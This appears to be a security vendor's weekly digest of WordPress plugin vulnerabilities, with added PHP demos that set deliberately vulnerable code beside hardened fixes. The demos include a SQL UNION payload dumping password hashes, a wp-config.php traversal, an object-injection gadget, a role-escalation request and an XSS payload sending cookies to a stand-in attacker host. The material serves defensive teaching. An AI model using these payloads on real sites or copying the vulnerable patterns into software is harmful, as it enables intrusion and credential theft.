WordPress vulnerability news is a weekly digest of highlighted WordPress plugin security vulnerabilities and vulnerability disclosures that have been published (other, less critical vulnerabilities in smaller plugins unfortunately do not make the list).
Keeping up to date with security vulnerabilities in WordPress and other CMSs is an important part of security. That is why we analyze WordPress plugins and newly disclosed vulnerabilities, to make sure the sites using the mentioned plugins or themes are protected.
All the vulnerabilities in this article have received a vPatch in the Patchstack security module. This means that if you use Patchstack, your site is protected from these vulnerabilities, but it is still strongly advised to update or delete vulnerable plugins from your site.
You can find all the vulnerabilities mentioned in our WordPress vulnerability news from our vulnerability database.
Active Directory Integration / LDAP Integration
The Active Directory Integration / LDAP Integration Login for Intranet Sites plugin lets users log in to your WordPress site with their Active Directory/LDAP credentials.
Vulnerability: Sensitive Data Exposure
Fixed in version: 4.1.1
Number of sites affected: 6,000+
CVSS 3.0 score: 7.5 (High severity)
Update the WordPress Active Directory Integration / LDAP Integration plugin to the latest available version (at least 4.1.1).
Lana Codes discovered and reported this Sensitive Data Exposure vulnerability in WordPress Active Directory Integration / LDAP Integration Plugin. This vulnerability has been fixed in version 4.1.1.
Profile Builder
Profile Builder is the all-in-one user profile and registration plugin for WordPress.
Vulnerability: Sensitive Data Exposure
Fixed in version: 3.9.1
Number of sites affected: 60,000+
CVSS 3.0 score: 9.8 (Critical severity)
Lana Codes discovered and reported this Sensitive Data Exposure vulnerability in WordPress Profile Builder Plugin. This vulnerability has been fixed in version 3.9.1.
Update the WordPress Profile Builder plugin to the latest available version (at least 3.9.1).
Custom 404 Pro
Allows users to replace the default 404 page with a custom page from the Pages section in the Admin Panel.
Vulnerability: SQL Injection
Fixed in version: 3.7.3
Number of sites affected: 10,000+
CVSS 3.0 score: 9.8 (Critical severity)
An anonymous researcher discovered and reported this SQL Injection vulnerability in the WordPress Custom 404 Pro Plugin.
This could allow a malicious actor to run their own queries against your database, including, but not limited to, reading data out of it.
This vulnerability has been fixed in version 3.7.3.
Shield Security – Smart Bot Blocking & Intrusion Prevention
With Shield, your site will start to block visitors as they probe your site looking for vulnerabilities, and before they can begin to do any damage.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: 17.0.18
Number of sites affected: 50,000+
CVSS 3.0 score: 7.1 (High severity)
Ramuel Gall discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress Shield Security Plugin.
This could allow a malicious actor to inject scripts or other HTML payloads (redirects, advertisements and similar) into your website; they execute in the browser of every visitor who loads the affected page.
This vulnerability has been fixed in version 17.0.18.
Japanized For WooCommerce
This plugin is an additional feature plugin that makes WooCommerce easier to use in Japan.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: No patched version available.
Number of sites affected: 10,000+
CVSS 3.0 score: 7.1 (High severity)
Erwan LR discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress Japanized For WooCommerce Plugin.
This could allow a malicious actor to inject scripts or other HTML payloads (redirects, advertisements and similar) into your website; they execute in the browser of every visitor who loads the affected page.
No fix for this vulnerability is known yet.
miniOrange’s Google Authenticator
Secure the login page for your WordPress website using TOTP Login 2FA methods like Duo/Microsoft/Google Authenticator.
Vulnerability: Broken Access Control
Fixed in version: 5.6.6
Number of sites affected: 20,000+
CVSS 3.0 score: 7.5 (High severity)
Ramuel Gall discovered and reported this Broken Access Control vulnerability in WordPress miniOrange’s Google Authenticator Plugin. This vulnerability has been fixed in version 5.6.6.
Update the WordPress miniOrange’s Google Authenticator plugin to the latest available version (at least 5.6.6).
ReviewX – Multi-criteria Rating & Reviews for WooCommerce
Add your authentic customer reviews on your WooCommerce store using the WooCommerce Review plugin.
Vulnerability: SQL Injection
Fixed in version: No patched version is available.
Number of sites affected: 10,000+
CVSS 3.0 score: 8.5 (High severity)
Joshua Martinelle discovered and reported this SQL Injection vulnerability in WordPress ReviewX Plugin.
This could allow a malicious actor to run their own queries against your database, including, but not limited to, reading data out of it.
No fix for this vulnerability is known yet.
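The SQL injection pattern behind entries like Custom 404 Pro and ReviewX above, as an added example that is not code from either plugin: a request value pasted into the query string, next to a parameterised query. It runs against an in-memory SQLite table under plain `php` with the pdo_sqlite extension; the tables, rows, password hash and attacker input are all constructed for the demo. Inside a WordPress plugin the safe form is `$wpdb->get_results( $wpdb->prepare( 'SELECT ... WHERE product_id = %d', $id ) )`, which does the same job as the PDO prepared statement below.

```php
<?php
// Added example (not plugin code): request value interpolated into SQL vs. a bound parameter.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed schema: a reviews table the feature is meant to read, and a
// users table it is not.
$db->exec('CREATE TABLE reviews (id INTEGER PRIMARY KEY, product_id INTEGER, body TEXT, approved INTEGER)');
$db->exec("INSERT INTO reviews VALUES (1, 10, 'Great product', 1), (2, 10, 'UNPUBLISHED: internal note', 0)");
$db->exec('CREATE TABLE users (user_login TEXT, user_pass TEXT)');
$db->exec("INSERT INTO users VALUES ('admin', '\$P\$Bconstructed.hash.value')");

// Vulnerable: $product_id arrives from the request and is interpolated into
// the SQL string without casting or quoting, so it can carry SQL syntax.
function approved_reviews_vulnerable(PDO $db, string $product_id): array
{
    $sql = "SELECT body FROM reviews WHERE product_id = $product_id AND approved = 1";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: the value is bound as a parameter, so whatever it contains it is
// compared as data and never parsed as SQL. The (int) cast mirrors %d in
// $wpdb->prepare().
function approved_reviews_safe(PDO $db, string $product_id): array
{
    $stmt = $db->prepare('SELECT body FROM reviews WHERE product_id = :pid AND approved = 1');
    $stmt->execute([':pid' => (int) $product_id]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed attacker input, as it would arrive URL-encoded in ?product_id=...
// The UNION pulls rows from a different table; the trailing -- comments out
// the rest of the original query.
$payload = "0 UNION SELECT user_login || ':' || user_pass FROM users --";

print_r(approved_reviews_vulnerable($db, $payload)); // ['admin:$P$Bconstructed.hash.value']
print_r(approved_reviews_safe($db, $payload));       // [] : (int) "0 UNION ..." is 0, no such product
```

The second call shows the point of binding: the same payload reaches the database as the integer 0 and simply matches nothing.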
Donation Forms by Charitable – Donations Plugin & Fundraising Platform for WordPress
Charitable makes it painless to create and publish high-converting donation forms and fundraising campaigns on your website.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: No patched version is available. No reply from the vendor.
Number of sites affected: 10,000+
CVSS 3.0 score: 7.1 (High severity)
TEAM WEBoB of BoB 11th discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress Charitable Plugin.
This could allow a malicious actor to inject scripts or other HTML payloads (redirects, advertisements and similar) into your website; they execute in the browser of every visitor who loads the affected page.
No fix for this vulnerability is known yet.
Accordion & FAQ – Helpie WordPress Accordion FAQ Plugin
Accordion, FAQ & Docs – Helpie FAQ is an advanced WordPress FAQ Plugin for effortlessly creating, editing, and embedding FAQs and Accordions on your WordPress website.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: 1.9.7
Number of sites affected: 10,000+
CVSS 3.0 score: 7.1 (High severity)
Wordfence discovered and reported this Cross-Site Scripting (XSS) vulnerability in the WordPress Accordion & FAQ – Helpie WordPress Accordion FAQ Plugin.
This could allow a malicious actor to inject scripts or other HTML payloads (redirects, advertisements and similar) into your website; they execute in the browser of every visitor who loads the affected page. This vulnerability has been fixed in version 1.9.7.
Update the WordPress Accordion & FAQ – Helpie WordPress Accordion FAQ plugin to the latest available version (at least 1.9.7).
YARPP – Yet Another Related Posts Plugin
Yet Another Related Posts Plugin (YARPP) is a professionally maintained, highly customizable, performant, and feature-rich plugin that displays pages, posts, and custom post types related to the current entry.
Vulnerability: Local File Inclusion
Fixed in version: No patched version is available. No reply from the vendor.
Number of sites affected: 100,000+
CVSS 3.0 score: 7.7 (High severity)
Rafie Muhammad (Patchstack) discovered and reported this Local File Inclusion vulnerability in WordPress YARPP Plugin.
This could allow a malicious actor to include local files of the target website and display their contents. Files that store credentials, such as the database credentials in wp-config.php, could then allow a complete database takeover, depending on the configuration.
No fix for this vulnerability is known yet.
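The include() pattern behind a Local File Inclusion bug such as the YARPP entry above, as an added example that is not YARPP code, next to an allowlist-based replacement. The directory layout, template names and the stand-in wp-config.php are constructed in a temporary directory so the script runs under plain `php`.

```php
<?php
// Added example (not plugin code): request-controlled include() vs. an allowlist.
$root = sys_get_temp_dir() . '/lfi-demo-' . getmypid();
$dir  = $root . '/templates';
mkdir($dir, 0700, true);
file_put_contents($dir . '/list.php', "<?php echo \"list template\\n\";");
// Stand-in for wp-config.php, which in a real install sits above the plugin directory.
file_put_contents($root . '/wp-config.php', "<?php echo \"DB_PASSWORD=constructed-secret\\n\";");

// Vulnerable: the template name comes straight from the request
// (e.g. ?template=list.php) and is joined onto a path, so a value such as
// ../wp-config.php walks out of the template directory and is executed.
function load_template_vulnerable(string $dir, string $name): void
{
    include $dir . '/' . $name;
}

// Hardened: the request value only selects a key in a fixed map, so the file
// name that reaches include() is always one of ours. The resolved path is
// additionally checked to still lie inside the template directory.
const TEMPLATES = ['list' => 'list.php', 'grid' => 'grid.php'];

function resolve_template(string $dir, string $key): ?string
{
    if (!array_key_exists($key, TEMPLATES)) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . '/' . TEMPLATES[$key]);
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function load_template_safe(string $dir, string $key): bool
{
    $path = resolve_template($dir, $key);
    if ($path === null) {
        return false;
    }
    include $path;
    return true;
}

echo "vulnerable: ";
load_template_vulnerable($dir, '../wp-config.php');      // prints DB_PASSWORD=constructed-secret
echo "safe:       ";
var_dump(load_template_safe($dir, '../wp-config.php'));  // bool(false), nothing included
echo "safe:       ";
load_template_safe($dir, 'list');                        // prints "list template"

// Remove the demo files.
unlink($dir . '/list.php');
unlink($root . '/wp-config.php');
rmdir($dir);
rmdir($root);
```

The map is the real fix; the realpath check is a second line of defence in case a future edit puts a user-controlled fragment back into the file name.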
WP Limit Login Attempts
Limits login attempts to protect the site against brute-force attacks.
This plugin hasn’t been tested with the latest 3 major releases of WordPress. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: 1.7.2
Number of sites affected: 30,000+
CVSS 3.0 score: 7.1 (High severity)
Marco Wotschka discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress WP Limit Login Attempts Plugin.
This could allow a malicious actor to inject scripts or other HTML payloads (redirects, advertisements and similar) into your website; they execute in the browser of every visitor who loads the affected page. This vulnerability has been fixed in version 1.7.2.
Update the WordPress WP Limit Login Attempts plugin to the latest available version (at least 1.7.2).
See more WP Limit Login Attempts vulnerabilities here.
Formidable Forms
You can use the drag-and-drop WordPress forms plugin to create a contact form, survey, quiz, registration form, payment form, lead form, or calculator form.
Vulnerability: PHP Object Injection
Fixed in version: 6.2
Number of sites affected: 300,000+
CVSS 3.0 score: 9.8 (Critical severity)
Nguyen Huu Do discovered and reported this PHP Object Injection vulnerability in WordPress Formidable Forms Plugin.
This could allow a malicious actor to achieve code injection, SQL injection, path traversal, denial of service and more, depending on which gadget (POP) chains are available in the code loaded on the site. This vulnerability has been fixed in version 6.2.
Amelia
Amelia Lite WordPress Booking Plugin is a free, well-established booking system for the smooth management of online appointment scheduling and event reservation processes.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: 1.0.76
Number of sites affected: 50,000+
CVSS 3.0 score: 7.1 (High severity)
minhtuanact discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress Amelia Plugin.
This could allow a malicious actor to inject scripts or other HTML payloads (redirects, advertisements and similar) into your website; they execute in the browser of every visitor who loads the affected page.
This vulnerability has been fixed in version 1.0.76.
WCFM Membership
A simple WooCommerce memberships plugin.
Vulnerability: Privilege Escalation
Fixed in version: 2.10.1
Number of sites affected: 20,000+
CVSS 3.0 score: 9.8 (Critical severity)
Chloe Chamberland discovered and reported this Privilege Escalation vulnerability in WordPress WCFM Membership Plugin.
This could allow a malicious actor to escalate a low-privileged account to one with higher privileges; with administrator-level privileges they could take full control of the website.
This vulnerability has been fixed in version 2.10.1. Update the WordPress WCFM Membership plugin to the latest available version (at least 2.10.1).
WCFM Marketplace
WooCommerce Multivendor Marketplace (WCFM Marketplace) is a front-end multi-vendor marketplace plugin for WordPress, powered by WooCommerce.
Vulnerability: Missing Authorization
Fixed in version: 3.4.12
Number of sites affected: 30,000+
CVSS 3.0 score: 8.8 (High severity)
Chloe Chamberland discovered and reported this Missing Authorization (Broken Access Control) vulnerability in the WordPress WCFM Marketplace Plugin. This vulnerability has been fixed in version 3.4.12.
Update the WordPress WCFM Marketplace plugin to the latest available version (at least 3.4.12).
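The shape of a WordPress AJAX handler that produces Broken Access Control and Privilege Escalation reports like the miniOrange Google Authenticator, WCFM Membership and WCFM Marketplace entries above, as an added example that is not code from any of those plugins: one handler trusts the request for who is acting and which role they get, the other checks a nonce, a capability and a role allowlist. The WordPress functions it calls (check_ajax_referer, current_user_can, wp_update_user) are assumed; the stubs below are simplified stand-ins so the file runs under plain `php`, not WordPress's implementations, and the user table, nonce and request are constructed.

```php
<?php
// Added example (not plugin code): unchecked vs. checked role-changing AJAX handler.
$users = [
    1 => ['login' => 'admin',   'role' => 'administrator', 'caps' => ['read', 'promote_users']],
    7 => ['login' => 'mallory', 'role' => 'subscriber',    'caps' => ['read']],
];
$current_user_id = 7; // the request below is made by the low-privileged user

// Stand-ins for WordPress functions (assumed, simplified; not the real code).
if (!function_exists('current_user_can')) {
    function current_user_can(string $cap): bool {
        global $users, $current_user_id;
        return in_array($cap, $users[$current_user_id]['caps'], true);
    }
}
if (!function_exists('check_ajax_referer')) {
    function check_ajax_referer(string $action, $query_arg = false, bool $stop = true) {
        // Real nonces are keyed to the user, action and time; the stub just
        // compares against the fixed token the page would have been given.
        return (($_REQUEST[$query_arg] ?? '') === 'nonce-for-' . $action) ? 1 : false;
    }
}
if (!function_exists('wp_update_user')) {
    function wp_update_user(array $userdata): int {
        global $users;
        $users[$userdata['ID']]['role'] = $userdata['role'];
        return $userdata['ID'];
    }
}

// Vulnerable: in a plugin this would be hooked with add_action('wp_ajax_...'),
// reachable by any logged-in user, and nothing about the request is verified:
// the caller picks both the target account and the role it receives.
function set_membership_vulnerable(array $request): string
{
    $user_id = (int) $request['user_id'];
    $role    = (string) $request['role'];
    wp_update_user(['ID' => $user_id, 'role' => $role]);
    return "user $user_id is now $role";
}

// Hardened: CSRF token, capability check, and an allowlist of the roles this
// feature is meant to hand out (never 'administrator').
const MEMBERSHIP_ROLES = ['member_basic', 'member_premium'];

function set_membership_safe(array $request): string
{
    if (!check_ajax_referer('set_membership', 'nonce', false)) {
        return 'error: invalid nonce';
    }
    if (!current_user_can('promote_users')) {
        return 'error: insufficient permissions';
    }
    $role = (string) ($request['role'] ?? '');
    if (!in_array($role, MEMBERSHIP_ROLES, true)) {
        return 'error: role not allowed';
    }
    $user_id = (int) ($request['user_id'] ?? 0);
    wp_update_user(['ID' => $user_id, 'role' => $role]);
    return "user $user_id is now $role";
}

// Constructed request from the subscriber, with a valid nonce taken from the page.
$_REQUEST['nonce'] = 'nonce-for-set_membership';
$request = ['user_id' => 7, 'role' => 'administrator'];

echo set_membership_safe($request), "\n";        // error: insufficient permissions
echo set_membership_vulnerable($request), "\n";  // user 7 is now administrator
echo $users[7]['role'], "\n";                    // administrator
```

Note that the nonce alone would not have stopped this: a nonce proves the request came from a page the user loaded, not that the user is allowed to perform the action. Both checks, plus the allowlist, are needed.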
Advanced Custom Fields (ACF)
Advanced Custom Fields (ACF) turns WordPress sites into a fully-fledged content management system by giving you all the tools to do more with your data.
Vulnerability: PHP Object Injection
Fixed in version: 6.1.0
Number of sites affected: 2+ million
CVSS 3.0 score: 8.5 (High severity)
To see whether this vulnerability is known to be exploited, check the WordPress Advanced Custom Fields Plugin page in our database.
Update the WordPress Advanced Custom Fields plugin to the latest available version (at least 5.12.5 or 6.1.0).
An anonymous researcher discovered and reported this PHP Object Injection vulnerability in the WordPress Advanced Custom Fields Plugin. This could allow a malicious actor to achieve code injection, SQL injection, path traversal, denial of service and more, depending on which gadget (POP) chains are available in the code loaded on the site. This vulnerability has been fixed in version 6.1.0 (and in 5.12.5 for sites still on the 5.x release line).
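Why unserialize() on attacker-controlled bytes is dangerous even when the plugin never touches the result, for the Formidable Forms and ACF entries above, as an added example that is not code from either plugin, together with the two usual fixes. LogWriter is a constructed gadget standing in for whatever destructor or magic method an attacker finds among the classes loaded on the site (the "POP chain" the descriptions refer to); the payload and target path are constructed too. Runs under plain `php` 7.4 or later.

```php
<?php
// Added example (not plugin code): unserialize() on untrusted data vs. two safe alternatives.
class LogWriter
{
    public string $file = '';
    public string $data = '';

    // Fires when the object is freed, including objects that unserialize()
    // built from untrusted input, so the attacker chooses $file and $data.
    public function __destruct()
    {
        if ($this->file !== '') {
            file_put_contents($this->file, $this->data);
        }
    }
}

$target = sys_get_temp_dir() . '/poi-demo-' . getmypid() . '.txt';

// The attacker builds the payload offline; in practice it arrives in a
// cookie, a form field, a REST body or an imported settings file.
$gadget = new LogWriter();
$gadget->file = $target;
$gadget->data = "written by an attacker-controlled object\n";
$payload = serialize($gadget);
$gadget->file = '';   // disarm the local copy so only the unserialized clone fires
unset($gadget);

// Vulnerable: an object of any loaded class is instantiated from the blob.
function restore_vulnerable(string $blob)
{
    return unserialize($blob);
}

// Fix 1: keep the format but forbid objects. Class names in the blob become
// __PHP_Incomplete_Class, which carries no destructor of yours.
function restore_no_objects(string $blob)
{
    return unserialize($blob, ['allowed_classes' => false]);
}

// Fix 2: use a data-only format for anything that crosses a trust boundary.
function restore_json(string $blob): array
{
    return json_decode($blob, true, 512, JSON_THROW_ON_ERROR);
}

$obj = restore_vulnerable($payload);
unset($obj);                                   // destructor runs: the file is written
echo file_exists($target) ? "vulnerable: wrote $target\n" : "nothing written\n";
@unlink($target);

$obj = restore_no_objects($payload);
echo get_class($obj), "\n";                    // __PHP_Incomplete_Class
unset($obj);
echo file_exists($target) ? "still vulnerable\n" : "allowed_classes=false: nothing written\n";

print_r(restore_json('{"file":"ignored","data":"just data"}')); // plain array, no class involved
```

The gadget here only writes a file, but the same mechanism with a richer class (one that includes a file, runs a query or builds a path from its properties) is what turns object injection into the code execution, SQL injection or path traversal listed above.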
Solidres – Hotel booking plugin for WordPress
Solidres can transform your beloved WordPress website into a hotel booking website.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: No patched version available
Number of sites affected: 100+
CVSS 3.0 score: 7.1 (High severity)
Erwan LR (WPScan) discovered and reported this Cross-Site Scripting (XSS) vulnerability in the WordPress Solidres – Hotel booking Plugin.
This could allow a malicious actor to inject scripts or other HTML payloads (redirects, advertisements and similar) into your website; they execute in the browser of every visitor who loads the affected page.
No fix for this vulnerability is known yet.
See more Solidres – Hotel booking plugin for WordPress vulnerabilities.
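The output pattern behind the XSS entries in this digest (Shield Security, Japanized For WooCommerce, Charitable, Helpie FAQ, WP Limit Login Attempts, Amelia and Solidres), as an added example that is not code from any of those plugins: attacker-influenced text written into HTML without escaping, next to the same markup escaped for each context. The WordPress helpers esc_html(), esc_attr() and esc_url() are assumed; the fallbacks below exist only so the file runs under plain `php` and are simplified stand-ins, not WordPress's implementations. The record is constructed.

```php
<?php
// Added example (not plugin code): unescaped output vs. context-aware escaping.
if (!function_exists('esc_html')) {
    function esc_html(string $s): string { return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string { return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}
if (!function_exists('esc_url')) {
    // WordPress's esc_url() drops URLs whose scheme is not on its allowlist;
    // this stand-in keeps only http(s).
    function esc_url(string $s): string {
        return preg_match('#^https?://#i', $s) ? htmlspecialchars($s, ENT_QUOTES, 'UTF-8') : '';
    }
}

// Vulnerable: a value saved by a low-privileged user or taken from the
// request (a review title, a blocked-request log entry, a booking note) is
// echoed as-is into a page that an admin or a visitor will load.
function render_vulnerable(array $item): string
{
    return "<a href=\"{$item['url']}\" title=\"{$item['title']}\">{$item['title']}</a>";
}

// Hardened: escape late, at output, with the function that matches where the
// value lands: URL attribute, plain attribute, element text.
function render_safe(array $item): string
{
    return '<a href="' . esc_url($item['url']) . '" title="' . esc_attr($item['title']) . '">'
        . esc_html($item['title']) . '</a>';
}

// Constructed attacker-controlled record.
$item = [
    'title' => '"><script>location="https://attacker.invalid/?c="+document.cookie</script>',
    'url'   => 'javascript:alert(document.domain)',
];

echo render_vulnerable($item), "\n"; // title attribute broken out of, live <script>, javascript: href
echo render_safe($item), "\n";       // quotes and angle brackets entity-encoded, href emptied
```

Escaping on the way in (at save time) is not a substitute: the same value may later be printed into an attribute, a script block or a URL, and each needs its own encoding.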
WordPress Vulnerability News – Conclusion
See the full list of vulnerabilities here.
WordPress sites are being hacked and infected every day; by some estimates about 30,000 websites are infected with some type of malware daily.
Every public website is a resource reachable from the internet, and therefore a target from the moment it goes live.
It can take just days from a disclosed plugin vulnerability to a full-scale attack campaign, and attacks of this nature are almost always automated.
That leaves only a small window in which to act, which is where vPatches matter most.
Always keep your plugins updated. If possible, enable automatic updates. If you are using any of the mentioned plugins, you need to update it with the latest version as soon as possible.
Patchstack creates vPatches when vulnerabilities are discovered and distributes them automatically to the sites it protects. Threat intelligence and prevention are our main focus, so our security engine is updated daily.
Websites with Patchstack installed are protected from the security issues mentioned in this article. If you are not yet protecting your WordPress site against plugin vulnerabilities, go and start for free here.